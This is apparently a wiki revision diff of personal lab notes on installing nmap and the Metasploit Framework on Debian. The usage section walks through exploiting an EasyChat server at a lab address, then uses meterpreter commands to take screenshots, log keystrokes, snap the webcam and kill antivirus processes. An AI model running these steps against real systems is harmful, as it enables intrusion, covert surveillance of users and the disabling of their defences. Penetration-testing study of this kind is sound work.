Difference between revisions of "Cloud Security"

 
(8 intermediate revisions by the same user not shown)
Line 7: Line 7:
 
<source>
 
<source>
 
$ apt-get install nmap
 
$ apt-get install nmap
 +
</source>
 +
 +
listen any port:
 +
<source>
 +
$ nmap -sV 192.168.56.1
 
</source>
 
</source>
  
Line 14: Line 19:
 
* https://nmap.org/book/inst-linux.html#inst-rpm
 
* https://nmap.org/book/inst-linux.html#inst-rpm
 
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox
 
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox
 +
 +
 +
==Installing Curl on Debian==
 +
<source>
 +
$ sudo apt install curl
 +
</source>
 +
 +
==How to Install [[Metasploit]] Framework on Ubuntu/Debian==
 +
 +
Download Metasploit installer using [[wget]] or [[curl]] command.
 +
 +
<source>
 +
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
 +
</source>
 +
 +
Once the script is downloaded, make it executable.
 +
 +
<source>
 +
$ chmod +x msfinstall
 +
</source>
 +
 +
Then execute the installer to install Metasploit Framework on Debian.
 +
<source>
 +
$ ./msfinstall
 +
</source>
 +
 +
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.
 +
 +
Check your Framework version using:
 +
<source>
 +
$ msfconsole --version
 +
</source>
 +
 +
When installation is completed, create and initialize the msf database.
 +
<source>
 +
$ msfdb init
 +
</source>
 +
This will create an initial database schema, set service account and start services. Output similar to below should be printed.
 +
 +
Use printed credentials to access MSF Web Service & API.
 +
 +
<b>Launching msfconsole</b>
 +
 +
Now  that database is initialized, you can launch msfconsole
 +
<source>
 +
$ msfconsole
 +
</source>
 +
 +
Verify database connectivity with the db_status command as shown below.
 +
<source>
 +
$ msf6 > db_status
 +
</source>
 +
 +
 +
<b>Updating Metasploit Framework</b>
 +
<source>
 +
$ msfupdate
 +
</source>
 +
 +
===Usage===
 +
<source>
 +
$ msfconsole
 +
$ msf > search easychat
 +
$ msf > use exploit/windows/http/efs_easychatserver_username
 +
msf exploit(windows/http/efs_easychatserver_username) > show options
 +
 +
msf exploit(windows/http/efs_easychatserver_username) > set RHOST 192.168.56.1
 +
 +
msf exploit(windows/http/efs_easychatserver_username) > exploit
 +
 +
meterpreter > ls
 +
 +
meterpreter > sysinfo
 +
 +
meterpreter > help
 +
 +
meterpreter > screenshot //to take a screenshot of the windows machine, we may use this command
 +
 +
meterpreter > keyscan_start //starts keylogger for the target port.
 +
 +
meterpreter > keyscan_dump //displays all of the keylogger logs
 +
 +
meterpreter > webcam_snap //it runs the webcam and takes a photo of the active user
 +
 +
meterpreter > kill xxx // i.e., you can kill a antivirus program
 +
</source>
 +
 +
=Vulnerability Scanner=
 +
==Tools==
 +
* https://www.tenable.com/products/nessus

Latest revision as of 17:29, 9 January 2021

Notes

nmap installation/Debian Linux

Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.


to install nmap on debian server:

$ apt-get install nmap

listen any port:

$ nmap -sV 192.168.56.1

resource:


Installing Curl on Debian

$ sudo apt install curl

How to Install Metasploit Framework on Ubuntu/Debian

Download Metasploit installer using wget or curl command.

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Once the script is downloaded, make it executable.

$ chmod +x msfinstall

Then execute the installer to install Metasploit Framework on Debian.

$ ./msfinstall

The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.

Check your Framework version using:

$ msfconsole --version

When installation is completed, create and initialize the msf database.

$ msfdb init

This will create an initial database schema, set service account and start services. Output similar to below should be printed.

Use printed credentials to access MSF Web Service & API.

Launching msfconsole

Now that database is initialized, you can launch msfconsole

$ msfconsole

Verify database connectivity with the db_status command as shown below.

$ msf6 > db_status


Updating Metasploit Framework

$ msfupdate

Usage

$ msfconsole
$ msf > search easychat
$ msf > use exploit/windows/http/efs_easychatserver_username
msf exploit(windows/http/efs_easychatserver_username) > show options

msf exploit(windows/http/efs_easychatserver_username) > set RHOST 192.168.56.1

msf exploit(windows/http/efs_easychatserver_username) > exploit

meterpreter > ls

meterpreter > sysinfo

meterpreter > help

meterpreter > screenshot //to take a screenshot of the windows machine, we may use this command

meterpreter > keyscan_start //starts keylogger for the target port. 

meterpreter > keyscan_dump //displays all of the keylogger logs

meterpreter > webcam_snap //it runs the webcam and takes a photo of the active user

meterpreter > kill xxx // i.e., you can kill a antivirus program

Vulnerability Scanner

Tools